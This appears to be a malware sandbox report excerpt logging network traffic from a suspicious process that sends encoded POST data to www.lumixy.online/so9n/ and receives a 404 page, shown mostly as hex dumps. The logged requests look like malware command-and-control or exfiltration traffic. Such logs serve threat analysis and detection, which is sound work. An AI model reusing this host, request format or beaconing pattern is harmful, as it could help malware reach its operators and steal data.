32 30 36 20 33 32 38 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
              Sep 6, 2024 09:06:35.510221958 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
              Sep 6, 2024 09:06:35.510231972 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
              Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
              Sep 6, 2024 09:06:35.510305882 CEST672INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
              Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
              Sep 6, 2024 09:06:35.510318041 CEST1236INData Raw: 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30
              Data Ascii: 5.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4517" d="m 76.9375,124.6
              Sep 6, 2024 09:06:35.510400057 CEST1236INData Raw: 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37 37 20 2d 38 2e 30 36 32 31 32 2c 33 31 2e 31 37 31 35 34 20 2d 31 32 2e 35 36 32 34 34 2c 34 37 2e 38 33 39
              Data Ascii: 16,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
              Sep 6, 2024 09:06:35.510412931 CEST1236INData Raw: 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 37 22 0a 20 20 20
              Data Ascii: inejoin:miter;stroke-opacity:1;" /> <path id="path4537" d="m 87.0625,123.03748 c 2.916637,10.42937 5.833458,20.8594 7.291964,26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.82
              Sep 6, 2024 09:06:35.510422945 CEST672INData Raw: 20 2d 35 2e 30 37 34 39 37 35 2c 32 36 2e 30 33 34 38 33 20 2d 31 2e 31 31 39 35 36 38 2c 35 2e 38 39 32 36 34 20 2d 31 2e 35 39 30 39 32 2c 37 2e 37 37 38 30 35 20 2d 31 2e 38 38 35 37 30 38 2c 31 30 2e 30 37 37 30 36 20 2d 30 2e 32 39 34 37 38
              Data Ascii: -5.074975,26.03483 -1.119568,5.89264 -1.59092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767"
              Sep 6, 2024 09:06:35.510520935 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
              Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
              Sep 6, 2024 09:06:35.510535955 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
              Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
              Sep 6, 2024 09:06:35.515091896 CEST1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
              Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              22192.168.2.649750184.94.212.115805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:37.482142925 CEST818OUTPOST /so9n/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.lumixy.online
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.lumixy.online
              Referer: http://www.lumixy.online/so9n/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 70 64 59 7a 33 76 31 58 4c 75 48 4c 4f 67 6b 35 6b 30 2b 78 41 33 56 32 70 48 71 46 66 33 4a 62 4e 5a 6a 79 44 51 54 65 71 34 6f 34 67 56 79 4d 6a 76 48 6c 58 38 41 79 70 59 72 47 64 7a 64 43 70 4d 37 32 57 37 65 64 4f 2b 57 42 36 48 48 4a 6c 52 36 65 46 34 77 31 47 53 7a 56 4a 35 63 4c 6d 77 34 50 55 33 43 37 75 59 62 69 31 77 71 50 4d 56 68 77 66 48 35 53 56 6a 38 71 2b 2b 73 41 6b 55 38 59 42 4e 51 59 45 48 41 50 32 41 33 55 48 30 75 4d 4a 50 53 67 44 6f 4b 52 58 49 54 56 46 52 2f 42 43 38 51 61 71 42 75 61 37 4c 54 69 5a 49 42 4e 49 38 43 4d 69 70 6b 42 72 63 69 6e 6b 35 72 67 68 41 6d 34 59 51 74 68 58 55 77 44 74 75 61 50 6a 4a 67 71 69 33 38 47 6c 7a 63 61 4c 41 3d 3d
              Data Ascii: FR=pdYz3v1XLuHLOgk5k0+xA3V2pHqFf3JbNZjyDQTeq4o4gVyMjvHlX8AypYrGdzdCpM72W7edO+WB6HHJlR6eF4w1GSzVJ5cLmw4PU3C7uYbi1wqPMVhwfH5SVj8q++sAkU8YBNQYEHAP2A3UH0uMJPSgDoKRXITVFR/BC8QaqBua7LTiZIBNI8CMipkBrcink5rghAm4YQthXUwDtuaPjJgqi38GlzcaLA==
              Sep 6, 2024 09:06:38.151392937 CEST1236INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:06:37 GMT
              Server: Apache
              Content-Length: 16052
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
              Sep 6, 2024 09:06:38.151427984 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
              Sep 6, 2024 09:06:38.151439905 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
              Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
              Sep 6, 2024 09:06:38.151479959 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
              Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
              Sep 6, 2024 09:06:38.151493073 CEST1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
              Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
              Sep 6, 2024 09:06:38.151596069 CEST1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
              Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
              Sep 6, 2024 09:06:38.151607990 CEST1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
              Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
              Sep 6, 2024 09:06:38.151619911 CEST108INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
              Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
              Sep 6, 2024 09:06:38.151628971 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
              Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
              Sep 6, 2024 09:06:38.151639938 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
              Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
              Sep 6, 2024 09:06:38.151819944 CEST1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
              Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              23192.168.2.649751184.94.212.115805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:40.027431011 CEST1831OUTPOST /so9n/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.lumixy.online
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.lumixy.online
              Referer: http://www.lumixy.online/so9n/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 70 64 59 7a 33 76 31 58 4c 75 48 4c 4f 67 6b 35 6b 30 2b 78 41 33 56 32 70 48 71 46 66 33 4a 62 4e 5a 6a 79 44 51 54 65 71 34 51 34 67 6d 71 4d 6a 4f 48 6c 57 38 41 79 67 34 72 48 64 7a 64 66 70 49 58 36 57 37 69 72 4f 38 75 42 37 69 54 4a 68 54 53 65 65 49 77 31 5a 43 7a 46 4e 35 63 6b 6d 77 6f 44 55 33 53 37 75 59 62 69 31 31 6d 50 61 77 56 77 5a 48 35 52 53 6a 38 6d 36 2b 73 6b 6b 55 31 76 42 4e 63 75 45 58 67 50 33 67 6e 55 42 47 32 4d 49 76 53 69 43 6f 4b 4a 58 49 50 77 46 56 6e 6a 43 38 30 38 71 44 79 61 72 65 57 41 65 34 78 62 62 76 50 67 32 2b 4d 61 6b 6f 6e 55 73 76 32 66 6b 51 53 76 57 68 64 71 50 41 73 46 6c 4a 79 53 6b 6f 38 57 67 58 46 33 74 6e 49 66 52 2b 4a 7a 78 74 6a 65 4d 65 58 72 43 7a 66 79 50 57 6d 42 71 66 63 38 6f 48 78 59 50 73 77 37 70 42 56 4a 4a 66 54 71 35 4b 32 4a 74 45 59 69 38 4f 2f 2f 74 37 67 70 48 68 2f 5a 6c 55 41 58 43 44 54 51 78 7a 61 7a 50 41 46 59 76 50 42 71 72 47 34 37 52 68 7a 34 65 41 51 5a 76 4f 41 72 53 52 55 4d 78 37 4e 66 72 48 50 70 56 55 6e [TRUNCATED]
              Data Ascii: FR=pdYz3v1XLuHLOgk5k0+xA3V2pHqFf3JbNZjyDQTeq4Q4gmqMjOHlW8Ayg4rHdzdfpIX6W7irO8uB7iTJhTSeeIw1ZCzFN5ckmwoDU3S7uYbi11mPawVwZH5RSj8m6+skkU1vBNcuEXgP3gnUBG2MIvSiCoKJXIPwFVnjC808qDyareWAe4xbbvPg2+MakonUsv2fkQSvWhdqPAsFlJySko8WgXF3tnIfR+JzxtjeMeXrCzfyPWmBqfc8oHxYPsw7pBVJJfTq5K2JtEYi8O//t7gpHh/ZlUAXCDTQxzazPAFYvPBqrG47Rhz4eAQZvOArSRUMx7NfrHPpVUntchPuB705bZLoKS/p2XFyJJIkIgKhkWsJqXbkcztUrMfi1BjGqGz0E+PHE9mv0pBrFRYQmgxzrBrc12BoxMBiICoLoh5Ly8pqrMO3IuEQml9s2u4TFVpE3GWNzj0SxmwoqK2eCYnp/w7NFXryVs7Z3Rz1LUcb0UTWt2isrrrDJQZGH9CR9UyuCiHuKt5gqPWFv7yglsw5Kk+hh7NwKzkZg6xtAur+smrAAlLtkk+a042r7+Jj4X6QZgsh2JNwRxXkTh8ygvv4Q2IzmzKtrwnEVTeFh7d1rGXs8Wa5KByzMYcCL4do7KRvXeigQxLd2HD7el2+KKIUzuEIqZsYIWg+1pkJtFbzUxEBQ1tgflFXaB3qfFzflYUiwnmJKIhMLnsUfbnxSy3OnWFtXh+OGOcrfJRhFNzBT4W1bK3qXMBrqKSd6gb9KVtfB4vM/dvngGaNgQM+qwi3zBROSkLox3M7xWSmvT5T0blyYiWDR8QHmWn2TCV/V65+Kg4vmf1AJzPiET0ArK6dSt91hQ23uwwhk1iMX9MWpWclW336qdZyf1XK3qKUz7uWSYRF47l3sS8OhxmxI4Hrlxb1KoTwqJHs2YFtIlfiyBZnd0Or/fwaWAl5mX2kUBS5EoHFWrXKvyU9R6qdBgGD/kLqzMG//DeG4F2N9oqcDWCst [TRUNCATED]
              Sep 6, 2024 09:06:40.600023031 CEST1236INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:06:40 GMT
              Server: Apache
              Content-Length: 16052
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
              Sep 6, 2024 09:06:40.600044966 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
              Sep 6, 2024 09:06:40.600058079 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
              Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
              Sep 6, 2024 09:06:40.600079060 CEST672INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
              Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
              Sep 6, 2024 09:06:40.600091934 CEST1236INData Raw: 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30
              Data Ascii: 5.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4517" d="m 76.9375,124.6
              Sep 6, 2024 09:06:40.600102901 CEST224INData Raw: 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37 37 20 2d 38 2e 30 36 32 31 32 2c 33 31 2e 31 37 31 35 34 20 2d 31 32 2e 35 36 32 34 34 2c 34 37 2e 38 33 39
              Data Ascii: 16,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
